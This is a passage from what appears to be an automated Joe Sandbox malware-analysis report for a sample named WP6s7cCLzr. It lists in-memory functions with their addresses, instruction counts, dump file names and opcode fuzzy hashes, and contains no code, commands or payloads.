                                                      Function 078200C5 Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b8e29cec764693f7ea413f435f137b080ce04bcfe1c682d8dc12da54e444d9
                                                      • Instruction ID: 29ea72a8f7d3433ee0f83cbb5603ae1a1535f76d32be819ec219962c6974791e
                                                      • Opcode Fuzzy Hash: b7b8e29cec764693f7ea413f435f137b080ce04bcfe1c682d8dc12da54e444d9
                                                      • Instruction Fuzzy Hash: E72186DB66C238BEF04345415B54BB6291EE7A7639F308436B807DA542E1954EDB3062
                                                      Function 07820101 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78d8dca8e3fb1b6a9ba63bfa4c645ca2eb2514319db51a493a607f808c7692fa
                                                      • Instruction ID: b69d97a9d3c561807d5c4710908c04cfc5fdf9ab9a8ea05b19ae0d14d086820c
                                                      • Opcode Fuzzy Hash: 78d8dca8e3fb1b6a9ba63bfa4c645ca2eb2514319db51a493a607f808c7692fa
                                                      • Instruction Fuzzy Hash: 1C21C8DB368238BDF04345456B547B66A1EE7A7735F308136F807D9541E1954ECA3062
                                                      Function 07820155 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b5f08e315bee59c7de8084b1ad0b654e8f49ede7bb19423986d92d825764465
                                                      • Instruction ID: 81542bb489ef00b11b279a8ac68429c78d568620ffef1afb8d8c6611692b5d62
                                                      • Opcode Fuzzy Hash: 4b5f08e315bee59c7de8084b1ad0b654e8f49ede7bb19423986d92d825764465
                                                      • Instruction Fuzzy Hash: 9821C5DB268238BDF04345816B54BB66A1EE7A7736F308036B907D9546A1894ECE3062
                                                      Function 078200F0 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6bbcd0839fbb91b34ed31855b331d854b1ec31e945d7484e1d275a6f64b964
                                                      • Instruction ID: cd112215ca64ed2b43ae228e40f775e5db1dc9390f14cd5527dd5e5a6d239963
                                                      • Opcode Fuzzy Hash: bf6bbcd0839fbb91b34ed31855b331d854b1ec31e945d7484e1d275a6f64b964
                                                      • Instruction Fuzzy Hash: 60210ADB26C238BDF14341815B507B66A1EE7A7735F308036F807D9542E1C54ECA3062
                                                      Function 07820183 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b36c29a921fe517eb50ced59869dcf0b21d147d75c45474b4429ba83eeb1dc6
                                                      • Instruction ID: 6eba59c2326d7dc60bc327f4089351307c9171fb2c5595b981b283ba8ce4a0f4
                                                      • Opcode Fuzzy Hash: 2b36c29a921fe517eb50ced59869dcf0b21d147d75c45474b4429ba83eeb1dc6
                                                      • Instruction Fuzzy Hash: 7C110ACA26C228BEF14301505A51BB22E2EE7B7335F308432F847D9581E1C54ECA3162
                                                      Function 07820126 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d7e93391b99506dadb7ae865a63395a64a365fc34151e692eab2f9f695f7ef6
                                                      • Instruction ID: a82a7036c0f0ff9dc11d354755d0439bbbfd9b30bd8b4d953a4b4d77f68a8afb
                                                      • Opcode Fuzzy Hash: 6d7e93391b99506dadb7ae865a63395a64a365fc34151e692eab2f9f695f7ef6
                                                      • Instruction Fuzzy Hash: D1116DDB66C3287EE14345505B54BB22E2EE7A7739F308136F447D9581E1C54ECB3162
                                                      Function 07820165 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d281ebed314d0d14f4c9e5bd1a587991baaf58c99e2fec1dd8036660d796ca9e
                                                      • Instruction ID: fc334fe0ddda4add05aeaeb1dcc755b52cf5de6d1fe940fda5493da5e099bad8
                                                      • Opcode Fuzzy Hash: d281ebed314d0d14f4c9e5bd1a587991baaf58c99e2fec1dd8036660d796ca9e
                                                      • Instruction Fuzzy Hash: 24112BDB368228BEF14314506B547F22B6EE7A3735F308532F403E6581E1D50ACB3161
                                                      Function 07770DA0 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6358c268907442153a5b8f3564be7641ef5957aac07504e5199ab36a5ee26ff0
                                                      • Instruction ID: e0b99a991e99a0fd80120f46cf25fa9678c92a8baffc252780c08d6a76722cc2
                                                      • Opcode Fuzzy Hash: 6358c268907442153a5b8f3564be7641ef5957aac07504e5199ab36a5ee26ff0
                                                      • Instruction Fuzzy Hash: E40192FB15D1157CB902D1812F28EFB977EE1D67B0B31886BF802E0406E2D95E5E9136
                                                      Function 078201CD Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3ea5f424732b5c73f4efd044025d9aa43791c6794d28312dcaaf2c51f19503e
                                                      • Instruction ID: e43b71213234714a6f8a6378ac53fdf972b7ae6769ac25f3a8e0a08724f16e35
                                                      • Opcode Fuzzy Hash: b3ea5f424732b5c73f4efd044025d9aa43791c6794d28312dcaaf2c51f19503e
                                                      • Instruction Fuzzy Hash: FC0148EB358224BEE60355556B906FA2A6EE7E3235F308436F402D6546E2914ACB3062
                                                      Function 078201A2 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac545a12fc3412582fd0b766e5473ed34fca669ca752669d0e4b3a3e4d3558bd
                                                      • Instruction ID: 646d5c776edbb01b03339fe2dc0b9f149cd753096e38453ba148d2c1c34519bc
                                                      • Opcode Fuzzy Hash: ac545a12fc3412582fd0b766e5473ed34fca669ca752669d0e4b3a3e4d3558bd
                                                      • Instruction Fuzzy Hash: 981180EB2582287EE20355545B90BF62B2EE7D3335F30803AF403C6445D291498B2121
                                                      Function 078201E2 Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6dcca279a03c3cf75858fba39ae68ece60f71b380ef83dff42f7b965713d05f
                                                      • Instruction ID: 97fb818b369a68fec9088ead26148aa039a6fdd6428b46c7cdfb0c5a4c98097f
                                                      • Opcode Fuzzy Hash: c6dcca279a03c3cf75858fba39ae68ece60f71b380ef83dff42f7b965713d05f
                                                      • Instruction Fuzzy Hash: 94F049DF2182287DA14355906B546B62E2EE3D3335B30813BF403DA402E1D54E8B7071
                                                      Function 078201F7 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c00d84284d5b3a521e689fbc0ccbc98287eba4d6758e5a6fe7950928b3aeb41
                                                      • Instruction ID: 5c83ca6bc04240b92daf7af8892706684b6fd04a7a117be63db45ba31cc64e6d
                                                      • Opcode Fuzzy Hash: 2c00d84284d5b3a521e689fbc0ccbc98287eba4d6758e5a6fe7950928b3aeb41
                                                      • Instruction Fuzzy Hash: B6F040EF2082287EA103259167902B62E2BE3D3335B308633F403E7402D0E54E8F2061
                                                      Function 0782020F Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e4e3c23caa425e8ea9b74a5aa987c2989c7c15f6979eedc63c1e0e33ddb1a2e
                                                      • Instruction ID: 46e729b87f74fdffc4d7a4efafc2f9f74d887a6d71a67dab8f697839d6869291
                                                      • Opcode Fuzzy Hash: 6e4e3c23caa425e8ea9b74a5aa987c2989c7c15f6979eedc63c1e0e33ddb1a2e
                                                      • Instruction Fuzzy Hash: 17F08BDB204604AFE1431560B6A02B53B2BE7A2739F308632E807D7241D0B44C871042
                                                      Function 0782023E Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90090d9db78655425e950aa47cca15c00daf45995999d7260a28d20a6fe5a8da
                                                      • Instruction ID: cf9f726de2ef860f6c4a83bde79ccf58d73f3fa99bfd288a9b882d0771ba6200
                                                      • Opcode Fuzzy Hash: 90090d9db78655425e950aa47cca15c00daf45995999d7260a28d20a6fe5a8da
                                                      • Instruction Fuzzy Hash: 06E0ABEAA00611BFD6536A4495C00B27F7EE76333573042BAF482E7441D2A40CC765A6
                                                      Function 0782027C Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fac71726e828c62df64ed1f3eaf8ef5b9c264532b6de3021a27cb58efb88fce6
                                                      • Instruction ID: 8f27221f58450ebb9979633c2264a95d54c019ac1e1f439572cd12c6a51656a7
                                                      • Opcode Fuzzy Hash: fac71726e828c62df64ed1f3eaf8ef5b9c264532b6de3021a27cb58efb88fce6
                                                      • Instruction Fuzzy Hash: 0BD0C08DE00F05AFC4033AA4D9800977ABDBB127BA3B24375ECC1AF440D5A5848341D7